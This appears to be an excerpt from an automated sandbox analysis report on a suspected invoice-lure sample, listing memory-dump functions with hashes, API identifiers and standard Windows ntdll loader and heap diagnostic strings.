                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: bc163107d90d8e9ee18d465e387ab9cda10cdb5de984a276ddaa0f26e2bd14d8
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 5281E4B8E053498EEF08CF68C8917EEBFB2AF45364F584659D861A72D1CB349B40CB51
                                  Function 324E9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  • Opcode ID: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                  • Instruction ID: fd56cd002e8a0fe9b14acf581c40e55f44b8ba2df3e16efefbcb6b3f360d7401
                                  • Opcode Fuzzy Hash: 12da7916babb7c62109e1bf10582a580622b2bf8d3dccc8ca320961cc4274895
                                  • Instruction Fuzzy Hash: 6A8129B5D002699BEB21CF54CC44BDEB7B4AB48754F4045EAE909F7280EB709E85CFA0
                                  Function 32514D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3255362F
                                  • LdrpFindDllActivationContext, xrefs: 32553636, 32553662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 3255365C
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 32553640, 3255366C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-3779518884
                                  • Opcode ID: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                  • Instruction ID: cfcc74cafb6ffaa16b12e78c9aa343fc58ec4232ecfd19d7b5df87a71769414d
                                  • Opcode Fuzzy Hash: ee150ec2682e801c25f1851d5e49ce9c4b008fc02d11bdedf0085a4222688856
                                  • Instruction Fuzzy Hash: DF314076900751BAFF11AF44C884B567BB4AB0179BF42646AE809A7150EF60BFC0C7D5
                                  Function 3250245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • TGK2, xrefs: 32502462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 3254A9A2
                                  • LdrpDynamicShimModule, xrefs: 3254A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3254A992
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGK2$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1393885241
                                  • Opcode ID: 7e50783013f01842094e59aa888172b0c2a12630a2d8f52841c3b27e100770d4
                                  • Instruction ID: 2043045adbdb4dec5003f57811e6a89c829405eb296263edad3fd708a37b1d5e
                                  • Opcode Fuzzy Hash: 7e50783013f01842094e59aa888172b0c2a12630a2d8f52841c3b27e100770d4
                                  • Instruction Fuzzy Hash: 44312675A81301ABF7149F69C895B5ABBB4FB84754F52445AF800F7251CFB09B82CF90
                                  Function 325920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: e4eacbd5094af22331f53ef34e065fbcc97fb693b3253073d459cc00514a5b1e
                                  • Instruction ID: 5ff7a27c09c04d379249763f155ee61a333dc31a897c4d2c2f4867eb5d589d4d
                                  • Opcode Fuzzy Hash: e4eacbd5094af22331f53ef34e065fbcc97fb693b3253073d459cc00514a5b1e
                                  • Instruction Fuzzy Hash: 2B2153BAE00219ABD740DE69DC40AEE7BE8EF54794F840116E905E3240EB30DB119FA1
                                  Function 32517B2F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID: T>l(
                                  • API String ID: 4281723722-210009607
                                  • Opcode ID: 3d4115ea1a032aa2ff616ac199698438451f904a4950a77654f64640e49773db
                                  • Instruction ID: b1135e50f8a5a3173343d11dbf4d3b139227874f46d96f49230da740b3de2026
                                  • Opcode Fuzzy Hash: 3d4115ea1a032aa2ff616ac199698438451f904a4950a77654f64640e49773db
                                  • Instruction Fuzzy Hash: 53314475E42219AFCF05DFA9D884A9DBBB1BB48321F20452AF511F7290DB305E41CF54
                                  Function 324DF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3610490719
                                  • Opcode ID: 0ad4723b57e33a9136dc9311199e13c79a016e269f0c28d0b676b1f4545efad8
                                  • Instruction ID: a7b8aa8c579dac9b7ea507c8c2ba0d76af1c0ea1ed61bd474a7309ad2719d3ce
                                  • Opcode Fuzzy Hash: 0ad4723b57e33a9136dc9311199e13c79a016e269f0c28d0b676b1f4545efad8
                                  • Instruction Fuzzy Hash: B3911371B41781DFE326CB24C8B4B6ABBE4BF80754F010459EA409B392DB74EA41CBD2
                                  Function 32500BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • LdrpCheckModule, xrefs: 3254A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 3254A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 3254A10F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-161242083
                                  • Opcode ID: 7e322bd6f8e840a473232071754339cce58bef6f1192520282dce42da5b057df
                                  • Instruction ID: 17f7dc5b507d77d887af04e83a877e286c289d8277485ea225e3650ea63f162f
                                  • Opcode Fuzzy Hash: 7e322bd6f8e840a473232071754339cce58bef6f1192520282dce42da5b057df
                                  • Instruction Fuzzy Hash: 3971A075A412059FEB08DF68C955BAEBBF4FB88304F14846DE805E7250EB74AB86CF50
                                  Function 325B8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 325B8B03
                                  • RtlDebugPrintTimes.NTDLL ref: 325B8B5B
                                    • Part of subcall function 32522B60: LdrInitializeThunk.NTDLL ref: 32522B6A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$InitializeThunk
                                  • String ID: $File
                                  • API String ID: 1259822791-2412145507
                                  • Opcode ID: c54992f9d7a2b08fa81ebbd16c89eaf3bc148850f460bb97892005e12e8b2244
                                  • Instruction ID: 73b82e780af1eee960c805dda30751d84dc7cbb1eac25f17eb79e63bfd76ad52
                                  • Opcode Fuzzy Hash: c54992f9d7a2b08fa81ebbd16c89eaf3bc148850f460bb97892005e12e8b2244
                                  • Instruction Fuzzy Hash: BE619B72A1022CABDF26CF24DC55BE9BBB9AF48710F4055A9A909E61C1DB709F84CF50
                                  Function 3251C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 325582E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 325582DE
                                  • Failed to reallocate the system dirs string !, xrefs: 325582D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1783798831
                                  • Opcode ID: d95148c6d63d2ec55a885ddc2a5d1120c8d46c40b2a084907b84979006ae6aef
                                  • Instruction ID: 2eb8cbcec8c1c1b3b965d4c2dd994772c0a45243c23909f9c6b94a4c0aff4ac1
                                  • Opcode Fuzzy Hash: d95148c6d63d2ec55a885ddc2a5d1120c8d46c40b2a084907b84979006ae6aef
                                  • Instruction Fuzzy Hash: 2E410975946300ABEB10EF64DC45B5B7BE8EF84751F40492EF844E3250EBB1EA41CB92
                                  Function 3251BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32557B7F
                                  • RTL: Resource at %p, xrefs: 32557B8E
                                  • RTL: Re-Waiting, xrefs: 32557BAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 91e8e15e33c59c8d9f511d7b206c46f96b8433ad54c02c8c426f9982d7de624b
                                  • Instruction ID: 502ee7e289418132fda2c8a7f604dac5db372e3555b5f2f9dfa8077befb08110
                                  • Opcode Fuzzy Hash: 91e8e15e33c59c8d9f511d7b206c46f96b8433ad54c02c8c426f9982d7de624b
                                  • Instruction Fuzzy Hash: 0041D1397017029FEB14CE25D940B5ABBE5EF88720F500A1DF956DB680EB71FA05CB91
                                  Function 3251B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3255728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 325572A3
                                  • RTL: Re-Waiting, xrefs: 325572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32557294
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 56fc9847e80e36369e6218b6af5bf897bf78da52f5eff34842e1115e25f0d204
                                  • Instruction ID: f7ecdd40a9202e6e44c335d35fca12d86d0662e30116b86a5965dcebf471c978
                                  • Opcode Fuzzy Hash: 56fc9847e80e36369e6218b6af5bf897bf78da52f5eff34842e1115e25f0d204
                                  • Instruction Fuzzy Hash: A441D035A00202ABEB10CE25CC41B56BBA5FF94714F604A1AF955EB280DB71FA46CBD1
                                  Function 32564755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32564899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32564888
                                  • LdrpCheckRedirection, xrefs: 3256488F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  • Opcode ID: 720c6764180e97d50724f11fa0cd81d3111cfb79b975963ee487822ae4693116
                                  • Instruction ID: 7bb9180372d229bd053787ad11e9438e16dfc0bb0f27ac926c9ac04e3a0d85b6
                                  • Opcode Fuzzy Hash: 720c6764180e97d50724f11fa0cd81d3111cfb79b975963ee487822ae4693116
                                  • Instruction Fuzzy Hash: 1A41D576A057919FDB31CF58C940A267BE4EF897AAF011659FC44E7311DB30DA01CB91
                                  Function 32592300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: e498e6449ced8da1ae2da090080279e39c546050b8240a1ce9aad4349c04ddd1
                                  • Instruction ID: 63a854dedf45e290fe31654cc53dadebe3f56fe7a9664bdcbb50b22552b2faf9
                                  • Opcode Fuzzy Hash: e498e6449ced8da1ae2da090080279e39c546050b8240a1ce9aad4349c04ddd1
                                  • Instruction Fuzzy Hash: 51316176A102199FDB54CE29DC40BEE7BF8EB44754F80459AE849E3240EF30AB458FA0
                                  Function 32565F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Wow64 Emulation Layer
                                  • API String ID: 3446177414-921169906
                                  • Opcode ID: 7ca23fe5ecb64c296f27faa2f23ad7ef7dbcab2cab89e8b699cb3cd3b656308f
                                  • Instruction ID: 1fbea05b62653572d0f29c280c8062996613334bec666aca79df4142540a47d0
                                  • Opcode Fuzzy Hash: 7ca23fe5ecb64c296f27faa2f23ad7ef7dbcab2cab89e8b699cb3cd3b656308f
                                  • Instruction Fuzzy Hash: DA21F7B590015DBFEF019AA4CD84CBFBB7DEF84699B044468FA06A2140EA319F059B70
                                  Function 325B7CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 22054147cd1a5e31a4c9769a74786ae18dec810a85747037d95c43cf0d000d2a
                                  • Instruction ID: 2c556525d8019fb8109f952c36eca0a2ebe36529dd2556235a3869895b4ea629
                                  • Opcode Fuzzy Hash: 22054147cd1a5e31a4c9769a74786ae18dec810a85747037d95c43cf0d000d2a
                                  • Instruction Fuzzy Hash: A9E16276E00309AFDF15CFA4D885BEEBBB4BF44394F10852AE915EB280D770AA45CB50
                                  Function 3250EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be668b9848aafbbaf978e33694163423655bcaccda23d800e1b88320abf755d0
                                  • Instruction ID: bda8efa61ed67bf0d370e8c5146c1534c07ea96e24e087b9b3abd973f6cca136
                                  • Opcode Fuzzy Hash: be668b9848aafbbaf978e33694163423655bcaccda23d800e1b88320abf755d0
                                  • Instruction Fuzzy Hash: DEE1E075D00708DFDB25CFA9C980A9DBBF1BF48354F20892AE956E7260DB71AA41CF50
                                  Function 3255EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: e52b45d46ae8fc61612be7cc99d5df749b28e89a9f23f0969c5866e55332975d
                                  • Instruction ID: 78388a8728406eaf50e268e38cfae434fa8f2d8d9b02f4b051cda1256918092d
                                  • Opcode Fuzzy Hash: e52b45d46ae8fc61612be7cc99d5df749b28e89a9f23f0969c5866e55332975d
                                  • Instruction Fuzzy Hash: EC714371E012199FDF05CFA4C980ADDBBB5BF49354F64402AE906FB250DB34AA06CFA4
                                  Function 325BA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 117c84eec06c2c93174e8732e15f3f19d2de7bede57ab9b480139eea3a3474d9
                                  • Instruction ID: 3c29d11812b7f99cb1e116154940cdfe78b831ee77cb5d598cb8055044ebc8e4
                                  • Opcode Fuzzy Hash: 117c84eec06c2c93174e8732e15f3f19d2de7bede57ab9b480139eea3a3474d9
                                  • Instruction Fuzzy Hash: 26515A79B01A129FEF08CE58C8A5A29BBF1FF89354B10456DD906DB790DB74EE41CB80
                                  Function 3255F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: cb09d2a00913b92c2e277843e54797277ca0ea6b80f04f2a48d8ee9acb69bb0c
                                  • Instruction ID: d4d4260a6b9b7c2ce4f9a088ef3157db6a988f5b0e04b686a88d68be5477a51e
                                  • Opcode Fuzzy Hash: cb09d2a00913b92c2e277843e54797277ca0ea6b80f04f2a48d8ee9acb69bb0c
                                  • Instruction Fuzzy Hash: FA5135B5E112199FEF04CF95D940ADDBBB1BF49354F25802AE806FB250D7389A41CF50
                                  Function 324E59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
